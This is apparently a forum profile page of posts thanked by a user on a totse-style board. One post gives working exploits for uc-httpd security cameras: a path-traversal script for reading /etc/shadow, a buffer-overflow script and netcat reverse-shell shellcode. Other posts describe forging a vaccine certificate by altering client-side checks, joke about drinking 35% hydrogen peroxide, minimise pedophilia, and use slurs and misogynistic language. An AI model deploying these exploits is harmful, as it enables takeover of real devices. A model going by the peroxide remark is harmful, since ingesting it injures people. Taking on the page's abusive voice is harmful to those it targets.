User Controls
Posts That Were Thanked by Sophie
-
2021-11-05 at 1:42 PM UTC in Last day on paperBasically the whole time I've been posting on totse and affiliated message boards I've been under court/government imposed restrictions on my freedom, making things like drinking alcohol, leaving my house, not notifying officials of exact times of medical appointments and leaving my city subject to periods of incarceration which I have endured over the past 15 years. It's been entirely my doing and I can't blame anyone but myself but I'm also acutely aware of the cold steel wheels of beurocracy that prefer you to lie in the track so they can trample you, leaving a mangled corpse in its wake. I like to think I sidestepped it a little and only suffered some minor injuries but honestly the scars will take a while to heal.
This is my last day under such conditions and I would like to thank all of you for helping me cope all these years. A special thank you to Lanny for starting and maintaining this place. We all post here for our own reasons and collectively you have all helped me more than you know and I hope I've helped someone a little bit too.
I hope this place is one day given the recognition it deservesThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-11-04 at 12:03 AM UTC in How come the pedos on this site are never the ones to die?pedophelia is a virus whose chirality has perfect balance. when one pedophile dies, his condition transfers to a normal person. the best thing to do with a virus like this is to leave it alone, and hope that the other viruses develop a similar ethic. pedophelia can lead society to better health if we dissociate the trauma of the subject.
The following users say it would be alright if the author of this post didn't die in a fire! -
2021-11-03 at 12:48 PM UTC in Don'tTellEm is quite jealous of Technologist...it would be retarded for anyone to be jealous of anyone else based on what they post on the internet, especially on this siteThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-11-03 at 3:41 AM UTC in Several posters are regularly using desomorphine...The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-11-01 at 5:08 AM UTC in You would be happier with kidsThe author of this post has returned to nothingnessThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-10-29 at 11:19 AM UTC in Vaccine certificate security
Originally posted by Biff Understudy This is the file that has all the interesting javascript(obfuscated) https://www2.medicareaustralia.gov.au/moaonline/main-es2015.68519c0caf05b65442a4.js
That's just a minimised Angular file, it contains all the basic logic to run the web application. I doubt it has anything interesting in it.
Originally posted by Technologist If a person is going to be a pussy and not get the vaccine, then they should wear it like a badge of honor.
You aren’t man enough to get a shot, man up and be honest about it pussies!
"Just accept being a second class citizen white man. Accept being a legal outcast like a man! Be proud that society can legally shit on you. Real men like being cucks. Be happy to be treated like shit. Be proud of us being treated better than you." -
2021-10-28 at 11:24 PM UTC in Well, well, well. What do we have here.The author of this post has returned to nothingness
-
2021-10-28 at 9:41 AM UTC in Vaccine certificate security
Originally posted by Biff Understudy Vaccine certificates(different from vaccine passports) are coming out next month in my country and I thought a thread would be good to discuss the various security measures implemented. I assume the international vaccine passports will be very secure, so I am more interested in local certificates.
For instance, earlier versions of the Australian vaccine certificate were extremely insecure. They worked like so..
- AJAX request to their server with a JSON response "vaccineStatus" : "Y" or "N"
- This JSON value was stored to a local variable (I set a breakpoint in javascript and simply changed this)
- Download immunisation history of user via AJAX request(PDF file - you could change this to a different file via javascript)
- IF vaccineStatus == "Y", THEN generate vaccine certificate by reading details from immunisation history PDF file
Others reported it was just as easy with a man-in-the-middle attack.
How secure will the QR code certificates be? What data do they share? What are some possible security issues with them?
The EU ones are signed with a private key. That makes them fairly secure when used with any EU vaccine passport validator app. There is some talk about some private keys either having been leaked or brute-forced, and there is a valid cert going around for Adolf Hitler, but it's perfectly possible some pharmacist or doctor created that just for the lulz.
Example code is at:
https://github.com/nofaceinbook/hc1_test_cert
https://github.com/cn-uofbasel/ch-dcc-keys
https://github.com/minvws/nl-covid19-coronacheck-provider-docs/tree/main/signing-demo
Info on the possible leak:
https://github.com/ehn-dcc-development/hcert-spec/issues/103
https://rfmirror.com/Thread-TRADING-make-EU-green-pass?page=1 -
2021-10-23 at 1:21 AM UTC in I banged a hooker with an Ernst Junger quote tattooed on her backSkipping right over a lot, groceries has been my sorta dinner companion, sorta girlfriend every time I go to Kyiv. Although I basically keep her (she earns about $350 a month at her job) she's pretty hard to get along with, and we have lots of fights. On one of our recent fights I decided to get a hooker, as you do in Kyiv.
I had one I had seen since the last time I was in Ukraine, and asked her to my hotel room. She advertised her language as "English", not as Ukrainian and Russian, and only took Euros, both of which were off. She was really nice on Whatsapp, but wouldn't meet me the first time I messaged her, since it was about 2am, and she only worked until 12am.
While in Kyiv I spent a few nights in the Ibis at the Railway Station. Beautiful hotel, I loved how the room seemed to have everything thought out for guests. I then moved into an AirBNB in an old Soviet flat for a week. Even Groceries Girl said the flat was dingy and old, but it had everything you might need, like a nice enough bed, a bathroom, kitchen, and a great view of the city. I slept in the bed the first night, but got new sheets and pillows before groceries girl stayed over, I am classy like that.
Groceries stayed over that weekend. We had a good time. Had some sex in the bed, Groceries did her usual weird thing laying down plastic everywhere and feeding me cheese and crackers. It's endearing. She only ever usually stays over on weekends, the rest of the time she works at her bullshit $2 an hour fake job.
Then Groceries and me had a fight. Basically it was after the I wanted to have sex or something, and she was, as usual cold and unresponsive. She is terrible at sex, never gets wet enough for penetration, always needs lube, never orgasms no matter what I do, even when I lick her out for hours. It's not me either before you start Techno - any other girl would cum buckets, but not her. She just has that whole cold Russian-descent thing going on. It kind of bothers me.
Anyway, the AirBNB was $20 a night, so I had to spend my last night at Ibis, about $70 a night, which didn't bother me. Ibis is just so clean and modern and western that it feels like being at home. So moved to Ibis, but Groceries didn't want to have sex the night before, so whatsapped the hooker again while waiting to check in.
Let me explain. Hotels let you check in at around 2pm. But they want you to check out at around 11am. I had checked out from the AirBNB at 10am, so I had moved my shit into my rental car, so was homeless for a few hours. I actually messaged the hooker from KFC, right across from Ibis, and arranged to meet her at 3pm, about an hour after I was due to check in.
There was a homeless outreach right beside KFC that day. Lots of homeless babushkas and dedushkas waiting for free food. On the road beside them there are $100k+ Mercs and Audis. It's sobering to encounter actually poor people. In the west we have drug addicts and bullshit like that, but not actual people who live sober, meal to meal. Groceries girl gives them money. I prefer to pretend they don't exist at all.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-10-22 at 5:05 PM UTC in Lanny stop giving out my IP or stopyou're imagining things again
-
2021-10-21 at 9:57 AM UTC in Sh/Bash based malware for *Nix.
Originally posted by troon you got me. i can taste my own tears. i'm really not trolling you, just responding to your crap-posting and schizo outbursts. then i learned you're actually a sick individual. i had thought it was satire, or at least just for your imagination. but no.
You're literally messaging two entirely different people you incompetent fuckwit lolThe following users say it would be alright if the author of this post didn't die in a fire! -
2021-10-14 at 12:41 AM UTC in Someone i know purchased a concentration of 35 % hydrogen peroxide and gargled it as mouthwash...35% Food Grade Hydrogen Peroxide is a very powerful chemical. Be safe and wear eye protection and gloves when drinking it.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-10-11 at 7:25 PM UTC in n-day IoT LFD+RCE Buffer overflow exploit - 2million+ vulnerable devices - for research only :) do not abuse.So, here is an n-day expoit that we (my 0day development crew) found back in 2017 (zero-day at the time). Reposting from my github. It's still unpatched despite being four years old, with over two million vulnerable IoT devices (with remote root possible on all of them).
The affected software is "uc-httpd" which is a web interface for a series of models of security cams. Due to the nature of this vuln, it's not possible for them to patch it without performing a mass product recall and re-writing the firmware, so currently it's still exploitable as an n-day :)
Do not abuse this. This is only for research, nothing else. I can't be held liable for your stupidity.
There are multiple exploits here. There is a local file disclosure and also a buffer overflow - you can generally get root via the LFD alone, so there's not really much need for the buffer overflow unless an LFD scenario fails.
So, the LFD is sent as a direct HTTP request to the box, rather than being a vuln POST/GET param. You can generally read /etc/shadow file on the box via the LFD, which contains PLAINTEXT hashes for the root password (so you can just SSH into teh box as root from there using the plaintext pass).
If for some reason you can't read the shadow file via the LFD, then instead you should attempt to read /mnt/mtd/Config/Account1 to get credentials from the admin interface, and then you can abuse the overflow from there to get root.
Here you can see the results from shodan, showing that there are currently more than 1.9 million devices running this (with our more extensive scanning returning over 2.5million devices):
LFD automated exploit code (python):
#!/usr/bin/env python
import urllib2, httplib, sys
httplib.HTTPConnection._http_vsn = 10
httplib.HTTPConnection._http_vsm_str = 'HTTP/1.0'
print "[+] uc-httpd 0day exploiter [+]"
print "[+] usage: python " + __file__ + " http://<target_ip>"
host = sys.argv[1]
fd = raw_input('[+] File or Directory: ')
print "Exploiting....."
print '\n'
print urllib2.urlopen(host + '/../../../../..' + fd).read()
It is also worth noting, that in addition to the LFD vuln... you can also supply a directory path to uc-httpd in the same manner that you'd supply the file you want to disclose... it will then output the contents of the directory to you as if you ran "ls" on that dir, so you can use that to enumerate directory contents in order to read even more files (although generally all you need to read to pop root is /etc/shadow or /mnt/mtd/Config/Account1)
If you can't read shadow file and ssh direct into the box as root that way, then read Account1 file and use the following buffer overflow within the web interface (protip: if ASLR is enabled, you can get the relevant memory regions via reading particular proc entries through the LFD)
Buffer Overflow automated exploit code (python):
import mechanize, time, sys, urllib, socket
from termcolor import colored
print colored('uc-httpd web-daemon bufferoverflow', 'red')
print colored('- Overwrites the stack (attach to see)', 'red')
print colored('- Kernel watchdog module restarts Sofia after 2 minutes', 'red')
time.sleep(2)
def at_login_overflow():
print colored('Sending payload.. ', 'red')
s_c = "\x2f\x4c\x6f\x67\x69\x6e\x2e\x68\x74\x6d" # Page id
x = mechanize.Browser()
x.set_handle_robots(False)
x.set_debug_responses(True)
x.addheaders = [("User-agent",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36")]
login = x.open(tar_full + s_c)
x.select_form(nr=0)
x["username"] = buffersm
x["password"] = "mikevirushackinglimited"
try:
x.submit()
except Exception:
print colored('Target daemon not vulnerable.', 'red')
pass
check_conn()
# Check interface status
def check_conn():
time.sleep(1)
print colored('Checking interface status..', 'red')
try:
urllib.urlopen(tar_full)
print colored('Exploit failed', 'red')
except Exception:
print colored('Finished.', 'red')
pass
tar = sys.argv[1]
tar_p = sys.argv[2]
buff_size = sys.argv[3]
tar_full = "http://" + tar + ":" + tar_p
# rec 180
buffersm = "\x41" * int(buff_size)
# post only
at_login_overflow()
Overwrite set shellcode:
\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63\x48\xc1\xef\x08\x57
\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xe9\x08\x51
\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65\x48\xc1\xeb\x30\x53
\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37\x49\xc1\xea\x20\x41
\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52\x41\x51\x57\x48\x89
\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37\x2e\x30\x2e\x30\x2e
\x31\xec\xf3\x26\x5a\x48\x31\xd2\x48\xbf\xff\x2f\x62\x69\x6e\x2f\x6e\x63
\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb9\xff\x2f\x62\x69\x6e\x2f\x73\x68
\x48\xc1\xe9\x08\x51\x48\x89\xe1\x48\xbb\xff\xff\xff\xff\xff\xff\x2d\x65
\x48\xc1\xeb\x30\x53\x48\x89\xe3\x49\xba\xff\xff\xff\xff\x31\x33\x33\x37
\x49\xc1\xea\x20\x41\x52\x49\x89\xe2\xeb\x11\x41\x59\x52\x51\x53\x41\x52
\x41\x51\x57\x48\x89\xe6\xb0\x3b\x0f\x05\xe8\xea\xff\xff\xff\x31\x32\x37
\x2e\x30\x2e\x30\x2e\x31
enjoy ;) but please don't abuse.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-10-08 at 4:02 AM UTC in Secret American Court to punish soldier for free speechscron if you're reading this I will transfer you $10 in btc if you twist HTS nipples HARD as punishment for those postsThe following users say it would be alright if the author of this post didn't die in a fire!
-
2021-10-04 at 8:19 PM UTC in Has anyone ever seen you type “niggasinspace”The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-10-03 at 12:28 PM UTC in 486 Will it start today?i was gonna shit on you but then i remembered ur friend died so consider this my condolences n ill come back to shit on u in a week thank you good day
-
2021-09-28 at 7:07 PM UTC in Amputation: dominate arm above elbow
-
2021-09-25 at 6:56 PM UTC in Chinese property market prolapsing - diagram included
-
2021-09-21 at 3:56 PM UTC in In a few more years New Zealand will cease to exist.The following users say it would be alright if the author of this post didn't die in a fire!
-
2021-09-20 at 12:08 AM UTC in Toronto Canada Night Life"when covid ends" lolThe following users say it would be alright if the author of this post didn't die in a fire!
